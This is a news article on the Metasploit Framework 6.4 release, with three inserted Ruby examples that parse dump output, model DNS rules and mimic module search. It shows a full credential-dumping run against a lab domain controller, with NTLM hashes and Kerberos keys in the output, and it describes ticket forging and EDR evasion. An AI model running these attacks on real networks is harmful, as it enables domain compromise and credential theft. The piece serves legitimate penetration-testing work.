Metasploit Framework 6.4 Released: What’s New!
The latest release from Metasploit, Framework 6.4, is a testament to this ongoing effort, bringing a wide range of new features and enhancements to the forefront of cybersecurity.
It has been a little over a year since Metasploit released version 6.3, and the team at Rapid7 has not been idle.
The new 6.4 version of the Metasploit Framework introduces significant improvements and new capabilities, building on the solid foundation of its predecessor.
This release underscores Metasploit's commitment to providing cutting-edge tools for penetration testers and cybersecurity professionals.
Kerberos Improvements
One of the highlights of this release is the extensive set of improvements made to Kerberos authentication support.
Building on the initial support introduced in version 6.3, Metasploit 6.4 adds new capabilities, including support for the diamond and sapphire techniques alongside the existing golden and silver techniques.
This update ensures compatibility with Windows Server 2022, keeping pace with the latest Windows targets.
Metasploit recently announced the release of Metasploit Framework 6.4, according to a recent article by Rapid7.
Additionally, Metasploit 6.4 introduces a new module that allows users to dump Kerberos tickets from a compromised host, similar to the functionality offered by the popular Rubeus tool.
This enhancement is useful when exploiting instances of Unconstrained Delegation, further expanding the toolkit available to cybersecurity professionals.
Example of running the gather/windows_secrets_dump module with Kerberos authentication and the DOMAIN action:
msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN
[*] Running module against 192.168.123.133
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Opening Service Control Manager
…
[*] 192.168.123.133:445 - Using cached credential for krbtgt/[email protected] [email protected]
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response
[*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin
[+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response
[*] 192.168.123.133:445 - Bound to DRSR
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local
[*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local
# SID's:
Administrator: S-1-5-21-1242350107-3695253863-3717863007-500
…
# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:::
…
# Full pwdump format:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
…
# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6
…
[*] 192.168.123.133:445 - Cleaning up...
[*] Auxiliary module execution completed
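The "Full pwdump format" lines above pack the account's RID, LM and NT hashes and a comma-separated list of account properties into one record. The following Ruby is an added example, not code from Metasploit or Rapid7: it parses those records into hashes and lists the properties a reviewer of an authorised assessment checks first (privileged group membership, non-expiring or not-required passwords, stale passwords). The Administrator line is the one printed above; the svc_backup line, its hash and the review thresholds are constructed for this example.

```ruby
# Added example, not Metasploit code: parse '# Full pwdump format' records and
# summarise the account properties worth a finding.
PWDUMP_SAMPLE = <<~DUMP
  # Full pwdump format:
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true::
  svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=true,PasswordLastChanged=201801010900,LastLogonTimestamp=202403181200,IsAdministrator=false,IsDomainAdmin=false,IsEnterpriseAdmin=false::
DUMP
# (the svc_backup record above is constructed; the Administrator record is from the article)

# The well-known LM hash of an empty password: its presence means no LM hash is stored.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'

# Each record is USER:RID:LM:NT:PROPERTIES:: where PROPERTIES is key=value pairs
# joined by commas. Comment lines ('#') and blank lines are skipped.
def parse_pwdump(text)
  text.each_line.filter_map do |line|
    line = line.strip
    next if line.empty? || line.start_with?('#')

    user, rid, lm, nt, props = line.split(':', 5)
    attrs = props.to_s.sub(/::\z/, '').split(',').to_h do |pair|
      key, value = pair.split('=', 2)
      [key, { 'true' => true, 'false' => false }.fetch(value, value)]
    end
    { user: user, rid: Integer(rid), lm_hash: lm, nt_hash: nt,
      lm_disabled: lm == EMPTY_LM, attrs: attrs }
  end
end

# PasswordLastChanged is printed as YYYYMMDDHHMM; turn it into a UTC Time.
def parse_stamp(stamp)
  return nil unless stamp =~ /\A\d{12}\z/

  Time.utc(stamp[0, 4].to_i, stamp[4, 2].to_i, stamp[6, 2].to_i, stamp[8, 2].to_i, stamp[10, 2].to_i)
end

# Findings for one account, evaluated against a fixed reference date so the
# result is reproducible (the date is the one in the loot filenames above).
def review_account(rec, as_of: Time.utc(2024, 3, 19), max_age_days: 365)
  a = rec[:attrs]
  findings = []
  findings << 'privileged' if a['IsAdministrator'] || a['IsDomainAdmin'] || a['IsEnterpriseAdmin']
  findings << 'password never expires' if a['PasswordNeverExpires']
  findings << 'password not required' if a['PasswordNotRequired']
  changed = parse_stamp(a['PasswordLastChanged'].to_s)
  findings << 'password older than a year' if changed && (as_of - changed) > max_age_days * 86_400
  findings
end

if __FILE__ == $PROGRAM_NAME
  parse_pwdump(PWDUMP_SAMPLE).each do |rec|
    puts "#{rec[:user]} (RID #{rec[:rid]}): #{review_account(rec).join(', ')}"
  end
end
```

Only the property list is interpreted; the hash columns are carried through unchanged so the records can be fed into whatever reporting the engagement uses.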
Raj Samani, Chief Scientist at Rapid7, recently tweeted his thanks to the Metasploit team and community for their outstanding work in successfully releasing version 6.4 of the Metasploit Framework.
DNS Configuration and New Session Types
Another important improvement is the enhanced handling of DNS queries within the Metasploit framework.
This update allows users to configure how hostnames should be resolved, which is particularly important in pivoting scenarios.
It ensures that DNS queries for internal resources are sent through a compromised host instead of from the user's own machine, improving operational security.
Metasploit 6.4 also introduces new PostgreSQL, MSSQL, MySQL, and SMB session types. These session types allow interactive queries against remote database instances and direct interaction with SMB shares, including file upload and download capabilities.
This addition streamlines running multiple modules against a single session, improving efficiency and effectiveness.
Examples of manipulating the DNS configuration:
dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1
dns add --rule honeypot.lab.lan --index 2 black-hole
dns add-static example2.lab.lan 192.0.2.201
dns add --index 1 --rule * static system 192.0.2.1
Viewing the current configuration:
msf6 > dns print
Default search domain: N/A
Default search list:
  * tor.example.com
  * localdomain
Current cache size: 0

Resolver rule entries
=====================

   #  Rule              Resolver    Comm channel
   -  ----              --------    ------------
   1  *.lab.lan         192.0.2.1   Session 1
   2  honeypot.lab.lan  black-hole  N/A
   3  *
   .    \_              static      N/A
   .    \_              10.4.5.45
   .    \_              10.3.20.98

Static hostnames
================

   Hostname          IPv4 Address  IPv6 Address
   --------          ------------  ------------
   example.lab.lan   192.0.2.200
   example2.lab.lan  192.0.2.201
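To make the rule table concrete, here is an added Ruby model of it; this is not Metasploit's resolver code. It reproduces the three rules and two static entries printed above and answers, for a given hostname, which resolver would handle it and over which comm channel. The matching semantics (first matching rule wins, a rule's resolvers are tried in order, the static resolver falls through when the table has no entry, and an address resolver is queried through the rule's session if one is set) are this example's assumptions; the two 10.x addresses stand in for the local system's nameservers as listed under the `*` rule.

```ruby
# Added example, not Metasploit's own resolver code: a small model of the rule
# table printed by 'dns print'. Rules are kept in index order and the first rule
# whose wildcard matches the hostname decides which resolver(s) answer it and
# over which comm channel. The fall-through semantics are this example's assumptions.
class DnsRuleSet
  Rule = Struct.new(:pattern, :resolvers, :session)

  # system_nameservers stands in for the host's own resolver configuration.
  def initialize(system_nameservers: [])
    @rules = []
    @static = {}
    @system_nameservers = system_nameservers
  end

  # Mirrors 'dns add --rule PATTERN [--index N] [--session ID] RESOLVER...'.
  # Indexes are 1-based as in the printed table; nil appends at the end.
  def add(rule:, resolvers:, index: nil, session: nil)
    entry = Rule.new(rule, Array(resolvers), session)
    if index
      @rules.insert(index - 1, entry)
    else
      @rules << entry
    end
    self
  end

  # Mirrors 'dns add-static HOSTNAME ADDRESS'.
  def add_static(hostname, address)
    @static[hostname.downcase] = address
    self
  end

  # Glob-style match: '*' stands for any run of characters, so '*.lab.lan'
  # matches 'dc01.lab.lan' (but not the bare 'lab.lan') and '*' matches every name.
  def matches?(pattern, hostname)
    re = Regexp.new('\A' + Regexp.escape(pattern).gsub('\*', '.*') + '\z', Regexp::IGNORECASE)
    re.match?(hostname)
  end

  # Decide how HOSTNAME would be looked up, without sending any query:
  #   { action: :black_hole }                answered as non-existent locally
  #   { action: :static, address: '...' }    answered from the static table
  #   { action: :query, nameservers: [...], channel: 'Session N' or 'local' }
  #   { action: :unresolvable }              no rule or resolver applied
  def resolve(hostname)
    host = hostname.downcase
    rule = @rules.find { |r| matches?(r.pattern, host) }
    return { action: :unresolvable } unless rule

    rule.resolvers.each do |resolver|
      case resolver
      when 'black-hole'
        return { action: :black_hole }
      when 'static'
        # Answers only when the table has an entry; otherwise try the next resolver.
        return { action: :static, address: @static[host] } if @static.key?(host)
      when 'system'
        unless @system_nameservers.empty?
          return { action: :query, nameservers: @system_nameservers, channel: 'local' }
        end
      else
        # A nameserver address: queried through the rule's session if it has
        # one, otherwise from the local host.
        channel = rule.session ? "Session #{rule.session}" : 'local'
        return { action: :query, nameservers: [resolver], channel: channel }
      end
    end
    { action: :unresolvable }
  end

  # The three rules and two static entries from the printed table above.
  def self.article_config
    new(system_nameservers: %w[10.4.5.45 10.3.20.98])
      .add(rule: '*.lab.lan', index: 1, session: 1, resolvers: '192.0.2.1')
      .add(rule: 'honeypot.lab.lan', index: 2, resolvers: 'black-hole')
      .add(rule: '*', resolvers: %w[static system])
      .add_static('example.lab.lan', '192.0.2.200')
      .add_static('example2.lab.lan', '192.0.2.201')
  end
end
```

Under this model rule order matters: with the table's ordering, `honeypot.lab.lan` is caught by the earlier `*.lab.lan` rule before the black-hole rule is reached, which is exactly the situation the `--index` option exists to fix.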
Indirect Syscalls Support and Discoverability Improvements
Metasploit 6.4 supports indirect syscalls, a technique commonly used by security tooling to avoid EDR/AV detection and evade dynamic analysis.
This update focuses on substituting Win32 API calls with indirect syscalls to their corresponding native APIs, enhancing the stealth of operations performed with Metasploit.
To help users navigate the large array of modules available in the framework, Metasploit 6.4 introduces improvements to module discoverability.
The new Hierarchical Search feature matches more fields within modules, making it easier for users to find the tools they need for their tasks.
For example, this will cause the auxiliary/admin/kerberos/forge_ticket module to show up when the user searches for forge_golden, because it is an action of the module:
msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/forge_ticket                .                normal  No     Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging
   1    \_ action: FORGE_DIAMOND                           .                .       .      Forge a Diamond Ticket
   2    \_ action: FORGE_GOLDEN                            .                .       .      Forge a Golden Ticket
   3    \_ action: FORGE_SAPPHIRE                          .                .       .      Forge a Sapphire Ticket
   4    \_ action: FORGE_SILVER                            .                .       .      Forge a Silver Ticket
   5    \_ AKA: Ticketer                                   .                .       .      .
   6    \_ AKA: Klist                                      .                .       .      .
   7  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability

Interact with a module by name or index. For example, info 7, use 7 or use auxiliary/admin/Kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(scanner/mysql/mysql_hashdump) >
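The following Ruby is an added example of how a search like the one above can be built; it is not Metasploit's search implementation. Each keyword is matched, case-insensitively, against a module's name, description, action names and descriptions, and AKA aliases, and a matched module is flattened into numbered rows (the module, then one child row per action and per alias) so that an index from a child row can be turned back into the parent module plus a preset action. The two Kerberos modules' names, descriptions, actions and aliases are taken from the output above; the `details` strings, the third filler module, and the rule that keywords must all match are constructed assumptions of this example.

```ruby
# Added example, not Metasploit's search code: a toy hierarchical module search.
MetaModule = Struct.new(:name, :description, :details, :actions, :aka, keyword_init: true)

# Names, descriptions, actions and AKA aliases of the two Kerberos modules come
# from the article's search output. The 'details' text and the third module are
# constructed so the filter has matching and non-matching text to work with.
MODULES = [
  MetaModule.new(
    name: 'auxiliary/admin/kerberos/forge_ticket',
    description: 'Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging',
    details: 'Constructed: forges Kerberos tickets from a known key',
    actions: {
      'FORGE_DIAMOND'  => 'Forge a Diamond Ticket',
      'FORGE_GOLDEN'   => 'Forge a Golden Ticket',
      'FORGE_SAPPHIRE' => 'Forge a Sapphire Ticket',
      'FORGE_SILVER'   => 'Forge a Silver Ticket'
    },
    aka: %w[Ticketer Klist]
  ),
  MetaModule.new(
    name: 'auxiliary/admin/kerberos/ms14_068_kerberos_checksum',
    description: 'MS14-068 Microsoft Kerberos Checksum Validation Vulnerability',
    details: 'Constructed: abuses PAC checksum validation to forge a PAC',
    actions: {}, aka: []
  ),
  MetaModule.new(
    name: 'auxiliary/scanner/mysql/mysql_hashdump',
    description: 'Constructed: MySQL password hash dump',
    details: '', actions: {}, aka: []
  )
].freeze

# Every field a keyword can hit, lower-cased once for comparison.
def searchable_fields(mod)
  ([mod.name, mod.description, mod.details] + mod.actions.keys + mod.actions.values + mod.aka)
    .map(&:downcase)
end

# A module matches when every keyword is a substring of at least one field.
# Matched modules become numbered rows: the module, then a child row per action
# and per alias, numbered consecutively as in the printed table.
def hierarchical_search(query, modules = MODULES)
  keywords = query.downcase.split
  rows = []
  modules.each do |mod|
    next unless keywords.all? { |k| searchable_fields(mod).any? { |f| f.include?(k) } }

    rows << { index: rows.size, module: mod.name, child: nil, action: nil }
    mod.actions.each_key do |action|
      rows << { index: rows.size, module: mod.name, child: "action: #{action}", action: action }
    end
    mod.aka.each do |name|
      rows << { index: rows.size, module: mod.name, child: "AKA: #{name}", action: nil }
    end
  end
  rows
end

# Resolve 'use N': a child row selects its parent module, and an action row
# also carries the action to preset; unknown indexes give nil.
def use_by_index(rows, index)
  row = rows.find { |r| r[:index] == index }
  return nil unless row

  { module: row[:module], action: row[:action] }
end

# Render rows the way the console does, with '\_' marking child rows.
def render(rows)
  rows.map { |r| format('%2d  %s', r[:index], r[:child] ? "  \\_ #{r[:child]}" : r[:module]) }.join("\n")
end

puts render(hierarchical_search('kerberos forge')) if __FILE__ == $PROGRAM_NAME
```

Searching for `forge_golden` matches only through the action name, which is the behaviour the article describes; `use 2` on the resulting rows selects forge_ticket with FORGE_GOLDEN already chosen.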
The release of Metasploit Framework 6.4 marks another milestone in the development of one of the most widely used penetration testing tools.
With its new features and enhancements, Metasploit continues to arm cybersecurity professionals with the tools they need to defend against the ever-evolving threats in the digital world.
As cyber threats grow in complexity, tools like Metasploit Framework 6.4 are essential for maintaining the security of digital infrastructures worldwide.
Source credit: cybersecuritynews.com